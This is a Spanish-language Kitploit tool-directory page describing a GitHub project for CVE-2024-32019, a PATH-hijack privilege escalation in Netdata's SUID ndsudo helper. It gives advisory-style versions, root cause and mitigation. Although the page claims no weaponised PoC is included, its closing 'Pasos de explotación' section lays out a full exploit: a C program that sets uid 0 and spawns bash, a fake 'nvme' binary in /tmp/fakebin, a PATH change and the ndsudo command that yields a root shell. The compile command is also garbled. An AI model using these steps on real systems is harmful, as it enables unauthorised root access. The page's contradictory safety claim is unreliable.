Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2024-32019-PoC — Comprueba la exposición a la escalada de privilegios de Netdata ndsudo SUID PATH para CVE-2024-32019 y valida los parches sin explotación weaponizada. | Kitploit
Herramientas/GitHubGitHub/ayub0x7/cve-2024-32019-poc
Herramientas DefensivasEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónVirtualización de SeguridadPruebas de Penetración
GitHubayub0x7/cve-2024-32019-poc

cve-2024-32019-PoC

Comprueba la exposición a la escalada de privilegios de Netdata ndsudo SUID PATH para CVE-2024-32019 y valida los parches sin explotación weaponizada.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-32019 — Escalada de privilegios local en ndsudo de Netdata

Resumen

El helper ndsudo de Netdata (instalado con setuid root) restringe qué comandos ejecutará, pero resuelve esos comandos usando el PATH del invocador. En las versiones afectadas, un usuario local puede colocar un binario malicioso antes en el PATH y hacer que ndsudo lo ejecute con privilegios de root. Corregido en Netdata 1.45.3 y 1.45.0-169.

Afectados / Corregidos

  • Afectados: >= 1.44.0-60, < 1.45.0-169 y (según el aviso upstream).

>= 1.45.0, < 1.45.3
  • Corregido: 1.45.3 (estable), 1.45.0-169 (nightly). GitHub

  • Impacto

    Escalada de privilegios local a root en sistemas donde ndsudo está instalado con SUID y el usuario puede invocarlo (habitualmente miembros del grupo netdata). NVDGitHub

    Causa raíz (a alto nivel)

    • ndsudo es SUID-root y permite una lista blanca de subcomandos como nvme-list, nvme-smart-log, etc.

    • Llama a ejecutables externos por nombre (p. ej., nvme), que se resuelven mediante PATH en lugar de usar rutas absolutas o una búsqueda segura y fija.

    • Si un directorio escribible aparece antes que las rutas del sistema, un atacante puede introducir un binario de aspecto similar que se ejecutará como root. GitHub

    Reproducción / Verificación segura

    Este repositorio incluye comprobadores no explotables que:

    • Inspeccionan /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (o donde esté instalado) en busca de SUID/propiedad.

    • Enumeran el PATH en busca de directorios escribibles anteriores a las rutas comunes del sistema.

    • Confirman la presencia de nombres de subcomandos en la lista blanca que ndsudo podría intentar ejecutar.

    • Opcionalmente ejecutan ndsudo --test <subcommand> para imprimir el comando resuelto sin ejecutarlo (usar con precaución, leer el código primero). GitHub

    ⚠️ No se incluye ningún PoC armado. Este proyecto es para defensores e investigadores para evaluar la exposición y validar los parches de forma responsable.

    Mitigación

    • Actualizar Netdata a 1.45.3 (estable) o 1.45.0-169 (nightly).

    • Como medida de defensa en profundidad, preferir rutas absolutas o un PATH mínimo saneado en helpers SUID; evitar conceder acceso innecesario a ndsudo. GitHubwiz.io

    Pasos de explotación

    1. Guardar el siguiente código C como nvme.c:
    root@kitploit:~
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    
    int main() {
        setuid(0);
        setgid(0);
        execl("/bin/bash", "bash", NULL);
        return 0;
    }
    
    2. Compilar el exploit
    root@kitploit:~
    gcc nvme.c - nvme
    
    3. Configuración del entorno
    root@kitploit:~
    mkdir -p /tmp/fakebin
    mv nvme /tmp/fakebin/
    chmod +x /tmp/fakebin/nvme
    
    4. Modificar el PATH
    root@kitploit:~
    export PATH=/tmp/fakebin:$PATH
    
    5. Comando de explotación
    root@kitploit:~
    /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
    

    Referencias

    • NVD: CVE-2024-32019. NVD

    • Aviso de Netdata (GHSA-pmhq-4cxq-wj93). GitHub

    • Resumen de Wiz. wiz.io

    • Artículo de Snyk. Vulnerability Guide

    • Listado MITRE/CVE. CVE

    Descargar herramienta